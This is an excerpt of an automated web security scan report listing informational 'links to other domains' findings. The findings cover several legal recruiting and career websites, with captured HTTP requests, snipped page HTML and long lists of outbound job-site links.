http://www.lateralattorneyreport.com/2010/10/moving-your-practice-and-portable-business-to-another-law-firm/
http://www.lateralattorneyreport.com/2010/10/take-your-career-to-dubai-hong-kong-and-abroad/
http://www.lateralattorneyreport.com/2010/10/the-marketability-of-insurance-lawyers/
http://www.lateralattorneyreport.com/2010/10/what-qualitiescharacteristics-should-i-look-for-in-a-legal-recruiter/
http://www.lateralattorneyreport.com/2010/11/handling-references-a-basic-guideline/
http://www.lateralattorneyreport.com/2010/12/big-changes-on-the-legal-scene-layoffs-and-outsourcing/
http://www.lateralattorneyreport.com/2010/12/should-you-switch-practice-areas/
http://www.lateralattorneyreport.com/2010/12/the-bcg-attorney-search-difference/
http://www.lateralattorneyreport.com/2010/12/why-most-attorneys-never-realize-their-full-potential/
http://www.lateralattorneyreport.com/2011/01/choosing-the-small-versus-the-large-firm/
http://www.lawcrossing.com/
http://www.preferredresumes.com/
http://www.recruitersubmitter.com/
http://www.resumeboomer.com/
http://www.varana.com/

Request

GET /hb-course/?utm_source=Judged&utm_medium=Banner&utm_campaign=hbcourse-thrive-212x212\ HTTP/1.1
Host: www.aharrisonbarnes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:21:49 GMT
Server: Apache/2.2.3 (Red Hat) DAV/2 PHP/5.1.6 mod_python/3.2.8 Python/2.4.3 mod_ssl/2.2.3 OpenSSL/0.9.8e-fips-rhel5 mod_perl/2.0.4 Perl/v5.8.8
X-Powered-By: PHP/5.1.6
Set-Cookie: PHPSESSID=jvnohg63snnhg1l5pelhp2vgo2; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
X-Pingback: http://www.aharrisonbarnes.com/xmlrpc.php
Set-Cookie: wpgb_visit_last_php-default=1295648510; expires=Sat, 21-Jan-2012 22:21:50 GMT; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 41521

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US" xmlns:fb="h
...[SNIP]...

<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...
<noscript><a href='http://srvr12.pdcsrvr.com/media/www/empsc/ck.php?n=afb7b597&cb=559569' target='_blank'><img src='http://srvr12.pdcsrvr.com/media/www/empsc/avw.php?zoneid=265&n=afb7b597' border='0' alt='' /></a>
...[SNIP]...
<li class="cat-item cat-item-1501"><a target="_blank" href="http://www.lateralattorneyreport.com/2011/01/choosing-the-small-versus-the-large-firm/" title="Choosing The Small Versus The Large Firm">Choosing The Small Versus The Large...</a>
...[SNIP]...
<li class="cat-item cat-item-1502"><a target="_blank" href="http://www.lateralattorneyreport.com/2010/12/why-most-attorneys-never-realize-their-full-potential/" title="Why Most Attorneys Never Realize Their Full Potential">Why Most Attorneys Never Realize Th...</a>
...[SNIP]...
<li class="cat-item cat-item-1503"><a target="_blank" href="http://www.lateralattorneyreport.com/2010/12/the-bcg-attorney-search-difference/" title="The BCG Attorney Search Difference">The BCG Attorney Search Difference...</a>
...[SNIP]...
<li class="cat-item cat-item-1504"><a target="_blank" href="http://www.lateralattorneyreport.com/2010/12/should-you-switch-practice-areas/" title="Should You Switch Practice Areas">Should You Switch Practice Areas...</a>
...[SNIP]...
<li class="cat-item cat-item-1505"><a target="_blank" href="http://www.lateralattorneyreport.com/2010/12/big-changes-on-the-legal-scene-layoffs-and-outsourcing/" title="Big Changes on The Legal Scene: Layoffs and Outsourcing">Big Changes on The Legal Scene: Lay...</a>
...[SNIP]...
<li class="cat-item cat-item-1506"><a target="_blank" href="http://www.lateralattorneyreport.com/2010/11/handling-references-a-basic-guideline/" title="Handling References: A Basic Guideline">Handling References: A Basic Guidel...</a>
...[SNIP]...
<li class="cat-item cat-item-1507"><a target="_blank" href="http://www.lateralattorneyreport.com/2010/10/the-marketability-of-insurance-lawyers/" title="The Marketability of Insurance Lawyers">The Marketability of Insurance Lawy...</a>
...[SNIP]...
<li class="cat-item cat-item-1508"><a target="_blank" href="http://www.lateralattorneyreport.com/2010/10/moving-your-practice-and-portable-business-to-another-law-firm/" title="Moving Your Practice (and Portable Business) to Another Law Firm">Moving Your Practice (and Portable ...</a>
...[SNIP]...
<li class="cat-item cat-item-1509"><a target="_blank" href="http://www.lateralattorneyreport.com/2010/10/what-qualitiescharacteristics-should-i-look-for-in-a-legal-recruiter/" title="What Qualities/Characteristics Should I Look for in a Legal Recruiter?">What Qualities/Characteristics Shou...</a>
...[SNIP]...
<li class="cat-item cat-item-1510"><a target="_blank" href="http://www.lateralattorneyreport.com/2010/10/take-your-career-to-dubai-hong-kong-and-abroad/" title="Take Your Career to Dubai, Hong Kong and Abroad">Take Your Career to Dubai, Hong Kon...</a>
...[SNIP]...
<div class="Normal" style="text-align: center; mso-margin-top-alt: auto; mso-margin-bottom-alt: auto;"><a href="http://www.1shoppingcart.com/SecureCart/SecureCart.aspx?mid=5B755568-CA79-4722-A277-1C4534523A6A&pid=45793872a819482f8fe5dfeebbc6de67&bn=1"><span style="color: blue; text-decoration: none;">
...[SNIP]...
<div id="footerLinks">
<a href="http://www.employmentresearchinstitute.com/" target="_blank"><img src="http://www.aharrisonbarnes.com/wp-content/themes/HB_new_theme/images/career_mission.png" width="164" height="45" style="margin-left: 408px; margin-right: 408px; margin-bottom: 7px; margin-top
...[SNIP]...
<li><a href="http://www.lawcrossing.com/" target="_blank">Legal Jobs</a>
...[SNIP]...
<li><a href="http://www.hound.com/" target="_blank"> Job Search Engine</a>
...[SNIP]...
<li><a href="http://www.employmentcrossing.com/" target="_blank"> Jobs</a>
...[SNIP]...
<li><a href="http://www.varana.com/" target="_blank"> Job Search</a>
...[SNIP]...
<li><a href="http://www.granted.com/" target="_blank"> Classified Ads</a>
...[SNIP]...
<li><a href="http://www.preferredresumes.com/" target="_blank"> Resume Writing Service</a>
...[SNIP]...
<li><a href="http://www.resumeboomer.com/" target="_blank"> Post Resume</a>
...[SNIP]...
<li><a href="http://www.RecruiterSubmitter.com/" target="_blank"> Send Resume</a>
...[SNIP]...
<li><a href="http://www.EmploymentAuthority.com/" target="_blank"> Resume Distribution</a>
...[SNIP]...
<li><a href="http://www.AttorneyResume.com/" target="_blank"> Legal Resume Writing</a>
...[SNIP]...
<li><a href="http://www.BCGSearch.com/" target="_blank"> Legal Recruiter</a>
...[SNIP]...
<li><a href="http://www.Judged.com/" target="_blank"> Law Firm News</a>
...[SNIP]...
<li><a href="http://www.JDJournal.com/" target="_blank"> Law News</a>
...[SNIP]...
<li><a href="http://www.JD2B.com/" target="_blank"> Law School Blog</a>
...[SNIP]...
<li><a href="http://www.LateralAttorneyReport.com/" target="_blank"> Legal Resources</a>
...[SNIP]...
<li><a href="http://www.EmploymentPotentials.com/" target="_blank"> Employment Resources</a>
...[SNIP]...

14.3. http://www.attorneyresume.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.attorneyresume.com
Path:	/

Issue detail

The page was loaded from a URL containing a query string:

http://www.attorneyresume.com/?utm_source=JDJ&utm_medium=Banner&utm_campaign=Benefits300x130\

The response contains the following links to other domains:

http://srvr12.pdcsrvr.com/media/www/empsc/avw.php?zoneid=185&n=ae4e8f51
http://srvr12.pdcsrvr.com/media/www/empsc/avw.php?zoneid=186&n=a11aa38b
http://srvr12.pdcsrvr.com/media/www/empsc/avw.php?zoneid=327&n=afef5bf7&
http://srvr12.pdcsrvr.com/media/www/empsc/avw.php?zoneid=341&n=ab265257&
http://srvr12.pdcsrvr.com/media/www/empsc/avw.php?zoneid=356&n=a2369d89&
http://srvr12.pdcsrvr.com/media/www/empsc/ck.php?n=a11aa38b&cb=554759
http://srvr12.pdcsrvr.com/media/www/empsc/ck.php?n=a2369d89&cb=963257
http://srvr12.pdcsrvr.com/media/www/empsc/ck.php?n=ab265257&cb=859567
http://srvr12.pdcsrvr.com/media/www/empsc/ck.php?n=ae4e8f51&cb=554579
http://srvr12.pdcsrvr.com/media/www/empsc/ck.php?n=afef5bf7&cb=956589
http://srvr12.pdcsrvr.com/media/www/empsc/fl.js
http://twitter.com/AttorneyResume
http://www.100kcrossing.com/
http://www.accountingcrossing.com/
http://www.accountmanagementcrossing.com/
http://www.actuarialcrossing.com/
http://www.admincrossing.com/
http://www.advertisingcrossing.com/
http://www.aerospacecrossing.com/
http://www.agriculturalcrossing.com/
http://www.aharrisonbarnes.com/
http://www.aharrisonbarnes.com/hb-course/
http://www.architecturecrossing.com/
http://www.auditorcrossing.com/
http://www.automotivecrossing.com/
http://www.aviationcrossing.com/
http://www.bcgsearch.com/
http://www.bilingualcrossing.com/
http://www.biotechcrossing.com/
http://www.bluecollarcrossing.com/
http://www.businessanalystcrossing.com/
http://www.businessdevelopmentcrossing.com/
http://www.callcentercrossing.com/
http://www.chefcrossing.com/
http://www.civilengineeringcrossing.com/
http://www.clevelcrossing.com/
http://www.clinicalresearchcrossing.com/
http://www.compliancecrossing.com/
http://www.computeraideddesigncrossing.com/
http://www.constructioncrossing.com/
http://www.consultingcrossing.com/
http://www.contractmanagementcrossing.com/
http://www.counselingcrossing.com/
http://www.cpluspluscrossing.com/
http://www.customerservicecrossing.com/
http://www.dbacrossing.com/
http://www.dentalcrossing.com/
http://www.designingcrossing.com/
http://www.diversitycrossing.com/
http://www.dotnetcrossing.com/
http://www.ecommercecrossing.com/
http://www.edfed.com/
http://www.editingcrossing.com/
http://www.educationcrossing.com/
http://www.employmentauthority.com/
http://www.employmentcrossing.com/
http://www.employmentresearchinstitute.com/
http://www.employmentscape.com/downloadaudio.php?aid=ec8956637a99787bd197eacd77acce5e
http://www.energycrossing.com/
http://www.engineeringcrossing.com/
http://www.entrylevelcrossing.com/
http://www.environmentalcrossing.com/
http://www.environmentalsafetyhealthcrossing.com/
http://www.erpcrossing.com/
http://www.execcrossing.com/
http://www.facebook.com/plugins/likebox.php?href=http://www.facebook.com/pages/AttorneyResume/313631672127&width=263&colorscheme=light&connections=100&stream=true&header=true&height=587
http://www.facilitiescrossing.com/
http://www.financialservicescrossing.com/
http://www.foodservicescrossing.com/
http://www.fundraisingcrossing.com/
http://www.giscrossing.com/
http://www.google-analytics.com/urchin.js
http://www.governmentcrossing.com/
http://www.graduateschoolloans.com/
http://www.healthcarecrossing.com/
http://www.helpdeskcrossing.com/
http://www.hospitalitycrossing.com/
http://www.hound.com/
http://www.hrcrossing.com/
http://www.hvaccrossing.com/
http://www.informationtechnologycrossing.com/
http://www.insurcrossing.com/
http://www.intellectualpropertycrossing.com/
http://www.internshipcrossing.com/
http://www.j2eecrossing.com/
http://www.jd2b.com/
http://www.jdjournal.com/
http://www.jdjournal.com/2011/01/20/vice-chairman-at-howrey-departs-for-dewey-leboeuf-2/
http://www.journalismcrossing.com/
http://www.judged.com/
http://www.lawcrossing.com/
http://www.lawcrossing.com/pdf/The2008LawCrossingSalarySurvey.pdf
http://www.lawfirmstaff.com/
http://www.lawschoolloanreport.org/
http://www.lawschoolloans.com/
http://www.legalauthority.com/
http://www.legalauthorityfinancial.com/
http://www.logisticscrossing.com/
http://www.managercrossing.com/
http://www.manufacturingcrossing.com/
http://www.marketingcrossing.com/
http://www.mediajobcrossing.com/
http://www.medicalschoolloans.com/
http://www.militarycrossing.com/
http://www.nursingcrossing.com/
http://www.occupationaltherapycrossing.com/
http://www.operationscrossing.com/
http://www.parttimecrossing.com/
http://www.pharmaceuticalcrossing.com/
http://www.physicalsecuritycrossing.com/
http://www.physicaltherapycrossing.com/
http://www.planningcrossing.com/
http://www.postdoctoralfellowcrossing.com/
http://www.prcrossing.com/
http://www.preferredresumes.com/
http://www.procurementcrossing.com/
http://www.productmanagercrossing.com/
http://www.projectmanagementcrossing.com/
http://www.publicinterestcrossing.com/
http://www.publishingcrossing.com/
http://www.purchasingcrossing.com/
http://www.qaqccrossing.com/
http://www.radiocrossing.com/
http://www.realestateandlandcrossing.com/
http://www.recruitingcrossing.com/
http://www.researchingcrossing.com/
http://www.resumeboomer.com/
http://www.retailcrossing.com/
http://www.sciencescrossing.com/
http://www.scientistcrossing.com/
http://www.sellingcrossing.com/
http://www.sqlcrossing.com/
http://www.teenagercrossing.com/
http://www.telecomcrossing.com/
http://www.tradingcrossing.com/
http://www.trainingcrossing.com/
http://www.transportationcrossing.com/
http://www.travelingcrossing.com/
http://www.truckingcrossing.com/
http://www.tvcrossing.com/
http://www.underwritingcrossing.com/
http://www.veterinarycrossing.com/
http://www.volunteercrossing.com/
http://www.workathomecrossing.com/
http://www.writingcrossing.com/

Request

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 19:34:24 GMT
Server: Apache/2.2.3 (Red Hat) DAV/2 PHP/5.1.6 mod_python/3.2.8 Python/2.4.3 mod_ssl/2.2.3 OpenSSL/0.9.8e-fips-rhel5 mod_perl/2.0.4 Perl/v5.8.8
X-Powered-By: PHP/5.1.6
Set-Cookie: PHPSESSID=r9q6qsdbdd70iag34sigvpv7m2; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 80394

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<link rel="SHORTCUT ICON" href="http://www.attorneyresume.com/faviconar.ico">
<titl
...[SNIP]...
<td width="52" valign="top"><a href="http://www.employmentscape.com/downloadaudio.php?aid=ec8956637a99787bd197eacd77acce5e" target="_blank"><img src="http://www.attorneyresume.com/images/img-mp3.jpg" alt="" width="52" height="58" border="0">
...[SNIP]...
<td width="88" valign="top"><a href="http://www.lawcrossing.com/pdf/The2008LawCrossingSalarySurvey.pdf" target="_blank"><img src="http://www.attorneyresume.com/images/lcsalarysurveyfree_book.gif" alt="" width="88" height="112" border="0">
...[SNIP]...
<br style="line-height:9px;">
» <a href="http://www.jdjournal.com/2011/01/20/vice-chairman-at-howrey-departs-for-dewey-leboeuf-2/" target="_blank"><strong>
...[SNIP]...

<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...
<noscript><a href='http://srvr12.pdcsrvr.com/media/www/empsc/ck.php?n=ab265257&cb=859567' target='_blank'><img src='http://srvr12.pdcsrvr.com/media/www/empsc/avw.php?zoneid=341&n=ab265257&' border='0' alt='' /></a>
...[SNIP]...

<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...
<noscript><a href='http://srvr12.pdcsrvr.com/media/www/empsc/ck.php?n=a2369d89&cb=963257' target='_blank'><img src='http://srvr12.pdcsrvr.com/media/www/empsc/avw.php?zoneid=356&n=a2369d89&' border='0' alt='' /></a>
...[SNIP]...

           <script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...
<noscript><a href='http://srvr12.pdcsrvr.com/media/www/empsc/ck.php?n=ae4e8f51&cb=554579' target='_blank'><img src='http://srvr12.pdcsrvr.com/media/www/empsc/avw.php?zoneid=185&n=ae4e8f51' border='0' alt='' /></a>
...[SNIP]...

<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...
<noscript><a href='http://srvr12.pdcsrvr.com/media/www/empsc/ck.php?n=afef5bf7&cb=956589' target='_blank'><img src='http://srvr12.pdcsrvr.com/media/www/empsc/avw.php?zoneid=327&n=afef5bf7&' border='0' alt='' /></a>
...[SNIP]...

           <script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...
<noscript><a href='http://srvr12.pdcsrvr.com/media/www/empsc/ck.php?n=a11aa38b&cb=554759' target='_blank'><img src='http://srvr12.pdcsrvr.com/media/www/empsc/avw.php?zoneid=186&n=a11aa38b' border='0' alt='' /></a>
...[SNIP]...
<td height="35" align="center"><a href="http://twitter.com/AttorneyResume" target="_blank"><img src="http://www.attorneyresume.com/images/twitter.jpg" border="0" alt="Twitter">
...[SNIP]...
<td><iframe src="http://www.facebook.com/plugins/likebox.php?href=http://www.facebook.com/pages/AttorneyResume/313631672127&width=263&colorscheme=light&connections=100&stream=true&header=true&height=587" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:263px; height:587px;" allowTransparency="true"></iframe>
...[SNIP]...
</a> | 
<a href="http://www.aharrisonbarnes.com/" target="_blank">Career Advice</a> | 
<a href="http://www.bcgsearch.com" target="_blank">Legal Recruiter</a> | 
<a href="http://www.lawcrossing.com" target="_blank">Legal Jobs</a>
...[SNIP]...
<br>
<a href="http://www.legalauthority.com" target="_blank">Resume Distribution Service</a> | 
<a href="http://www.resumeboomer.com" target="_blank">Post Resume</a> | 
<a href="http://www.aharrisonbarnes.com/hb-course/" target="_blank">Job Search Course</a>
...[SNIP]...
</table>
       <script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
       </script>
...[SNIP]...
<td align="center" height="50"><a href="http://www.employmentresearchinstitute.com" target="_blank"><img src="http://www.attorneyresume.com/images/logo_es.jpg" border="0" alt="Employment Research Institute">
...[SNIP]...
<td>
               <a href="http://www.100kcrossing.com" target="_blank">100KCrossing</a> | <a href="http://www.AccountingCrossing.com" target="_blank">AccountingCrossing</a>
...[SNIP]...
<br><a href="http://www.accountmanagementcrossing.com" target="_blank">AccountManagementCrossing</a> | <a href="http://www.ActuarialCrossing.com" target="_blank">ActuarialCrossing</a>
...[SNIP]...
<br><a href="http://www.AdminCrossing.com" target="_blank">AdminCrossing</a> | <a href="http://www.advertisingcrossing.com" target="_blank">AdvertisingCrossing</a> | <a href="http://www.AerospaceCrossing.com" target="_blank">AerospaceCrossing</a>
...[SNIP]...
<br><a href="http://www.AgriculturalCrossing.com" target="_blank">AgriculturalCrossing</a> | <a href="http://www.ArchitectureCrossing.com" target="_blank">ArchitectureCrossing</a>
...[SNIP]...
<br><a href="http://www.AuditorCrossing.com" target="_blank">AuditorCrossing</a> | <a href="http://www.AutomotiveCrossing.com" target="_blank">AutomotiveCrossing</a> | <a href="http://www.AviationCrossing.com" target="_blank">AviationCrossing</a>
...[SNIP]...
<br><a href="http://www.bcgsearch.com" target="_blank">BCG Attorney Search</a> | <a href="http://www.BilingualCrossing.com" target="_blank">BilingualCrossing</a> | <a href="http://www.BioTechCrossing.com" target="_blank">BiotechCrossing</a>
...[SNIP]...
<br><a href="http://www.BlueCollarCrossing.com" target="_blank">BlueCollarCrossing</a> | <a href="http://www.businessanalystcrossing.com" target="_blank">BusinessAnalystCrossing</a>
...[SNIP]...
<br><a href="http://www.BusinessDevelopmentCrossing.com" target="_blank">BusinessDevelopmentCrossing</a> | <a href="http://www.CallCenterCrossing.com" target="_blank">CallCenterCrossing</a>
...[SNIP]...
<br><a href="http://www.ChefCrossing.com" target="_blank">ChefCrossing</a> | <a href="http://www.CivilEngineeringCrossing.com" target="_blank">CivilEngineeringCrossing</a> | <a href="http://www.CLevelCrossing.com" target="_blank">CLevelCrossing</a> <br><a href="http://www.ClinicalResearchCrossing.com" target="_blank">ClinicalResearchCrossing</a> | <a href="http://www.ComplianceCrossing.com" target="_blank">ComplianceCrossing</a>
...[SNIP]...
<br><a href="http://www.ComputerAidedDesignCrossing.com" target="_blank">ComputerAidedDesignCrossing</a> | <a href="http://www.ConstructionCrossing.com" target="_blank">ConstructionCrossing</a>
...[SNIP]...
<br><a href="http://www.ConsultingCrossing.com" target="_blank">ConsultingCrossing</a> | <a href="http://www.ContractManagementCrossing.com" target="_blank">ContractManagementCrossing</a>
...[SNIP]...
<br><a href="http://www.CounselingCrossing.com" target="_blank">CounselingCrossing</a> | <a href="http://www.CPlusPlusCrossing.com" target="_blank">CPlusPlusCrossing</a>
...[SNIP]...
<br><a href="http://www.CustomerServiceCrossing.com" target="_blank">CustomerServiceCrossing</a> | <a href="http://www.DBACrossing.com" target="_blank">DBACrossing</a> | <a href="http://www.DentalCrossing.com" target="_blank">DentalCrossing</a> <br><a href="http://www.DesigningCrossing.com" target="_blank">DesigningCrossing</a> | <a href="http://www.DiversityCrossing.com" target="_blank">DiversityCrossing</a> | <a href="http://www.DotNetCrossing.com" target="_blank">DotNetCrossing</a> <br><a href="http://www.ECommerceCrossing.com" target="_blank">ECommerceCrossing</a> | <a href="http://www.edfed.com" target="_blank">EdFed</a> | <a href="http://www.EditingCrossing.com" target="_blank">EditingCrossing</a>
...[SNIP]...
<br><a href="http://www.EducationCrossing.com" target="_blank">EducationCrossing</a> | <a href="http://www.EmploymentAuthority.com" target="_blank">EmploymentAuthority</a>
...[SNIP]...
<br><a href="http://www.employmentcrossing.com" target="_blank">EmploymentCrossing</a> | <a href="http://www.EnergyCrossing.com" target="_blank">EnergyCrossing</a> | <a href="http://www.EngineeringCrossing.com" target="_blank">EngineeringCrossing</a>
...[SNIP]...
<br><a href="http://www.EntryLevelCrossing.com" target="_blank">EntryLevelCrossing</a> | <a href="http://www.EnvironmentalCrossing.com" target="_blank">EnvironmentalCrossing</a>
...[SNIP]...
<br><a href="http://www.EnvironmentalSafetyHealthCrossing.com" target="_blank">EnvironmentalSafetyHealthCrossing</a> | <a href="http://www.erpcrossing.com" target="_blank">SAPCrossing</a> <br><a href="http://www.ExecCrossing.com" target="_blank">ExecCrossing</a> | <a href="http://www.FacilitiesCrossing.com" target="_blank">FacilitiesCrossing</a>
...[SNIP]...
<br><a href="http://www.FinancialServicesCrossing.com" target="_blank">FinancialServicesCrossing</a> | <a href="http://www.FoodServicesCrossing.com" target="_blank">FoodServicesCrossing</a>
...[SNIP]...
<br><a href="http://www.FundraisingCrossing.com" target="_blank">FundraisingCrossing</a> | <a href="http://www.GISCrossing.com" target="_blank">GISCrossing</a> | <a href="http://www.GovernmentCrossing.com" target="_blank">GovernmentCrossing</a>
...[SNIP]...
<br><a href="http://www.graduateschoolloans.com" target="_blank">Graduate School Loans</a> | <a href="http://www.HealthcareCrossing.com" target="_blank">HealthcareCrossing</a>
...[SNIP]...
<br><a href="http://www.HelpDeskCrossing.com" target="_blank">HelpDeskCrossing</a> | <a href="http://www.HospitalityCrossing.com" target="_blank">HospitalityCrossing</a> | <a href="http://www.hound.com" target="_blank">Hound</a> <br><a href="http://www.hrcrossing.com" target="_blank">HRCrossing</a> | <a href="http://www.HVACCrossing.com" target="_blank">HVACCrossing</a> | <a href="http://www.InformationTechnologyCrossing.com" target="_blank">InformationTechnologyCrossing</a>
...[SNIP]...
<br><a href="http://www.insurcrossing.com" target="_blank">InsurCrossing</a> | <a href="http://www.IntellectualPropertyCrossing.com" target="_blank">IntellectualPropertyCrossing</a>
...[SNIP]...
<br><a href="http://www.InternshipCrossing.com" target="_blank">InternshipCrossing</a> | <a href="http://www.J2EECrossing.com" target="_blank">J2EECrossing</a> | <a href="http://www.jd2b.com" target="_blank">JD2B</a> | <a href="http://www.jdjournal.com" target="_blank">JDJournal</a> <br><a href="http://www.JournalismCrossing.com" target="_blank">JournalismCrossing</a> | <a href="http://www.judged.com" target="_blank">Judged</a> | <a href="http://www.lawcrossing.com" target="_blank">LawCrossing</a> | <a href="http://www.lawfirmstaff.com" target="_blank">Law Firm Staff</a> <br><a href="http://www.lawschoolloanreport.org" target="_blank">Law School Loan Report</a> | <a href="http://www.lawschoolloans.com" target="_blank">Law School Loans</a>
...[SNIP]...
<br><a href="http://www.legalauthority.com" target="_blank">Legal Authority</a> | <a href="http://www.LegalAuthorityFinancial.com" target="_blank">Legal Authority Financial</a>
...[SNIP]...
<br><a href="http://www.LogisticsCrossing.com" target="_blank">LogisticsCrossing</a> | <a href="http://www.ManagerCrossing.com" target="_blank">ManagerCrossing</a>
...[SNIP]...
<br><a href="http://www.ManufacturingCrossing.com" target="_blank">ManufacturingCrossing</a> | <a href="http://www.marketingcrossing.com" target="_blank">MarketingCrossing</a>
...[SNIP]...
<br><a href="http://www.MediaJobCrossing.com" target="_blank">MediaJobCrossing</a> | <a href="http://www.medicalschoolloans.com" target="_blank">Medical School Loans</a> | <a href="http://www.MilitaryCrossing.com" target="_blank">MilitaryCrossing</a>
...[SNIP]...
<br><a href="http://www.NursingCrossing.com" target="_blank">NursingCrossing</a> | <a href="http://www.OccupationalTherapyCrossing.com" target="_blank">OccupationalTherapyCrossing</a>
...[SNIP]...
<br><a href="http://www.operationscrossing.com" target="_blank">OperationsCrossing</a> | <a href="http://www.PartTimeCrossing.com" target="_blank">PartTimeCrossing</a>
...[SNIP]...
<br><a href="http://www.PharmaceuticalCrossing.com" target="_blank">PharmaceuticalCrossing</a> | <a href="http://www.PhysicalSecurityCrossing.com" target="_blank">PhysicalSecurityCrossing</a>
...[SNIP]...
<br><a href="http://www.PhysicalTherapyCrossing.com" target="_blank">PhysicalTherapyCrossing</a> | <a href="http://www.PlanningCrossing.com" target="_blank">PlanningCrossing</a>
...[SNIP]...
<br><a href="http://www.PostDoctoralFellowCrossing.com" target="_blank">PostdoctoralFellowCrossing</a> | <a href="http://www.prcrossing.com" target="_blank">PRCrossing</a> <br><a href="http://www.preferredresumes.com" target="_blank">Preferred Resumes</a> | <a href="http://www.ProcurementCrossing.com" target="_blank">ProcurementCrossing</a>
...[SNIP]...
<br><a href="http://www.ProductManagerCrossing.com" target="_blank">ProductManagerCrossing</a> | <a href="http://www.projectmanagementcrossing.com" target="_blank">ProjectManagementCrossing</a>
...[SNIP]...
<br><a href="http://www.PublicInterestCrossing.com" target="_blank">PublicInterestCrossing</a> | <a href="http://www.PublishingCrossing.com" target="_blank">PublishingCrossing</a>
...[SNIP]...
<br><a href="http://www.PurchasingCrossing.com" target="_blank">PurchasingCrossing</a> | <a href="http://www.qaqccrossing.com" target="_blank">QAQCCrossing</a> | <a href="http://www.RadioCrossing.com" target="_blank">RadioCrossing</a> <br><a href="http://www.realestateandlandcrossing.com" target="_blank">RealEstateAndLandCrossing</a> | <a href="http://www.RecruitingCrossing.com" target="_blank">RecruitingCrossing</a>
...[SNIP]...
<br><a href="http://www.ResearchingCrossing.com" target="_blank">ResearchingCrossing</a> | <a href="http://www.RetailCrossing.com" target="_blank">RetailCrossing</a> | <a href="http://www.sciencescrossing.com" target="_blank">SciencesCrossing</a>
...[SNIP]...
<br><a href="http://www.ScientistCrossing.com" target="_blank">ScientistCrossing</a> | <a href="http://www.sellingcrossing.com" target="_blank">SellingCrossing</a> | <a href="http://www.SQLCrossing.com" target="_blank">SQLCrossing</a> <br><a href="http://www.TeenagerCrossing.com" target="_blank">TeenagerCrossing</a> | <a href="http://www.TelecomCrossing.com" target="_blank">TelecomCrossing</a> | <a href="http://www.TradingCrossing.com" target="_blank">TradingCrossing</a>
...[SNIP]...
<br><a href="http://www.TrainingCrossing.com" target="_blank">TrainingCrossing</a> | <a href="http://www.TransportationCrossing.com" target="_blank">TransportationCrossing</a>
...[SNIP]...
<br><a href="http://www.TravelingCrossing.com" target="_blank">TravelingCrossing</a> | <a href="http://www.TruckingCrossing.com" target="_blank">TruckingCrossing</a> | <a href="http://www.TVCrossing.com" target="_blank">TVCrossing</a> <br><a href="http://www.UnderWritingCrossing.com" target="_blank">UnderwritingCrossing</a> | <a href="http://www.VeterinaryCrossing.com" target="_blank">VeterinaryCrossing</a>
...[SNIP]...
<br><a href="http://www.VolunteerCrossing.com" target="_blank">VolunteerCrossing</a> | <a href="http://www.WorkAtHomeCrossing.com" target="_blank">WorkAtHomeCrossing</a> | <a href="http://www.WritingCrossing.com" target="_blank">WritingCrossing</a>
...[SNIP]...

14.4. http://www.bcgsearch.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bcgsearch.com
Path:	/

Issue detail

The page was loaded from a URL containing a query string:

http://www.bcgsearch.com/?utm_source=JDJournal&utm_medium=Banner&utm_campaign=Trusted985x90\

The response contains the following links to other domains:

http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab
http://twitter.com/BCGAttorneyJobs
http://www.aharrisonbarnes.com/
http://www.aharrisonbarnes.com/do-not-stop-seeing-opportunity-step-outside-your-minds-comfort-zone-and-begin-to-dream/
http://www.aharrisonbarnes.com/push-yourself-outside-your-comfort-zone/
http://www.aharrisonbarnes.com/script/ahbarnesnewsletter_signup.js
http://www.attorneyresume.com/
http://www.employmentresearchinstitute.com/
http://www.facebook.com/plugins/like.php?href=http%3A%2F%2Fwww.facebook.com%2FBCGSearch&layout=standard&show_faces=true&width=250&action=like&colorscheme=light&height=80
http://www.hound.com/
http://www.jd2b.com/
http://www.jdjournal.com/
http://www.judged.com/
http://www.lateralattorneyreport.com/
http://www.lawcrossing.com/
http://www.legalauthority.com/

Request

GET /?utm_source=JDJournal&utm_medium=Banner&utm_campaign=Trusted985x90\ HTTP/1.1
Host: www.bcgsearch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 19:34:26 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: PHPSESSID=fngo6iuc8kl9dkavlshi7saf51; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 31541

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
